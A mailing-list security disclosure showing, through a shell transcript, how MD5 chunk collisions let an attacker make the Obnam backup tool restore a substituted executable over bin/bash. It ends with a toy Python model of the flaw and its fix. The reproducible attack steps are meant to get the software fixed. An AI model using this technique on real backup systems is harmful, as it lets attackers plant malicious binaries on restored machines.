Lars Wirzenius wrote:
> I agree that this attack would work. It's not exactly likely (MD5
> collisions are still not trivial, in my understanding, to generate),
> but it's clear Obnam needs to switch.

md5sum collisions can be downloaded from Wikipedia. So..

joey@darkstar:~>md5sum a b
79054025255fb1a26e4bc422aef54eb4  a
79054025255fb1a26e4bc422aef54eb4  b
joey@darkstar:~>cmp a b
a b differ: byte 20, line 1
- exit 1
joey@darkstar:~>mkdir test
joey@darkstar:~>mkdir test/bad
joey@darkstar:~>cp a test/bad/file
joey@darkstar:~>mkdir repo
joey@darkstar:~>obnam -r repo backup test/
Backed up 3 files (of 3 found), uploaded 128.0 B in 0s at 1.6 KiB/s average speed
joey@darkstar:~>mkdir test/good
joey@darkstar:~>cp b test/good/file
joey@darkstar:~>obnam -r repo backup test/
Backed up 4 files (of 5 found), uploaded 0.0 B in 0s at 0.0 B/s average speed
joey@darkstar:~>obnam -r repo restore --to test.restored
Restored 8 files, downloaded 256.0 B in 0s at 14.6 KiB/s average speed
joey@darkstar:~>cmp test.restored/home/joey/test/bad/file test.restored/home/joey/test/good/file
joey@darkstar:~>

So far so bad, but these colliding files were produced by some security
researcher (in 2004) not me. So they're not going to do something evil
by themselves.

But, obnam md5s files in blocks. By default 1 mb blocks. So, I can simply
use any ELF executable I like, padded to 1 megabyte long, and stick the
colliding file at the end of it.

That limits what I can do with the exploit -- since I'm relying on a
random colliding block, I can't put my exploit code in that. Both versions
of my executable will need to examine what's appended to it, and enable
exploit code that's built into the executable when it sees the triggering
data.

joey@darkstar:~>ls -l bash
-rwxr-xr-x 1 joey joey 1048576 Mar 16 14:07 bash*
joey@darkstar:~>cp bash toupload
joey@darkstar:~>cat b >> toupload
joey@darkstar:~>cp bash evil
joey@darkstar:~>cat a >> evil
joey@darkstar:~>cmp evil toupload
evil toupload differ: byte 1048596, line 4243
joey@darkstar:~>rm -rf test repo
joey@darkstar:~>mkdir repo test test/bin test/ftp
joey@darkstar:~>cp evil test/ftp/
joey@darkstar:~>obnam -r repo backup test/
Backed up 4 files (of 4 found), uploaded 1.0 MiB in 0s at 10.3 MiB/s average speed
joey@darkstar:~>cp toupload test/bin/bash
joey@darkstar:~>obnam -r repo backup test/
Backed up 4 files (of 5 found), uploaded 0.0 B in 0s at 0.0 B/s average speed

(Note 0 bytes in second backup)

joey@darkstar:~>obnam -r repo restore --to test.restored
File checksum restore error: /home/joey/test/bin/bash
Restored 8 files, downloaded 2.0 MiB in 0s at 24.7 MiB/s average speed
ERROR: There were errors when restoring
- exit 1
joey@darkstar:~>cmp test.restored/home/joey/test/bin/bash evil
joey@darkstar:~>

Obnam replaced the safe version of bin/bash with the evil version.
It told me it was doing it, but in reality I'm a harried sysadmin in
a disaster recovery scenario and the checksum error message scrolled
off the screen 10 minutes ago..

The checksum error happens because obnam stores a md5sum of the whole
file, and the files as a whole have different md5sums.

37943662e8496d259e373eb2591578d4  toupload
69d94e6864510fb0a416ddd1567a3dcb  evil

It would probably be good to make obnam refuse to write out a file
when its checksum is wrong. I don't think it solves the attack though.
A system restored without bin/bash wouldn't boot. But then the attacker
could make the restore skip an arbitrary file, which is probably enough
to break the system in some way that allows further exploits.

All of the above is the weakest approach to the attack. Much better would
be a chosen prefix md5 attack. It would defeat the whole file checksum too,
and would let the exploit code be shipped only in the evil version of the
executable, not both versions. From what I've read, a chosen-prefix md5
attack is not extremely hard. (complexity 2^39)

-- 
see shy jo
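The chunk-level behaviour shown in the message above, as an added example that is not part of the original message and is not Obnam's code: a hypothetical `ChunkStore` deduplicates chunks by digest alone, with a byte-sum `weak_digest` standing in for a collidable MD5 and 4-byte chunks in place of 1 MB ones. It is contrasted with SHA-256 chunk keys and a restore that refuses to write a file on a whole-file checksum mismatch; all names and sample bytes are constructed.

```python
import hashlib

CHUNK = 4  # toy chunk size; the message describes 1 MB chunks

def weak_digest(data):
    """Constructed stand-in for a collidable chunk digest: byte sum mod 256."""
    return "%02x" % (sum(data) % 256)

def sha256_digest(data):
    return hashlib.sha256(data).hexdigest()

class ChunkStore:
    """Hypothetical deduplicating store keyed by chunk digest."""

    def __init__(self, chunk_digest):
        self.chunk_digest = chunk_digest
        self.chunks = {}  # chunk digest -> chunk bytes
        self.files = {}   # name -> (chunk digests, whole-file SHA-256)

    def backup(self, name, data):
        """Store data; return the number of bytes actually uploaded."""
        keys, uploaded = [], 0
        for i in range(0, len(data), CHUNK):
            piece = data[i:i + CHUNK]
            key = self.chunk_digest(piece)
            if key not in self.chunks:  # dedup trusts the digest alone
                self.chunks[key] = piece
                uploaded += len(piece)
            keys.append(key)
        self.files[name] = (keys, sha256_digest(data))
        return uploaded

    def restore(self, name, refuse_on_mismatch=True):
        """Reassemble a file; by default refuse to return bad content."""
        keys, whole = self.files[name]
        data = b"".join(self.chunks[k] for k in keys)
        if refuse_on_mismatch and sha256_digest(data) != whole:
            raise ValueError("whole-file checksum mismatch: " + name)
        return data

# Constructed sample files: same first chunk, last chunks collide under weak_digest.
EVIL = b"ELF!" + b"AABA"
GOOD = b"ELF!" + b"AAAB"

def demo(chunk_digest):
    """Back up EVIL first, then GOOD, as in the message; return upload sizes."""
    store = ChunkStore(chunk_digest)
    first = store.backup("ftp/evil", EVIL)
    second = store.backup("bin/bash", GOOD)
    return store, first, second
```

With `weak_digest` the second backup uploads 0 bytes, mirroring the "uploaded 0.0 B" line in the transcript, and only the whole-file check at restore time notices the substitution.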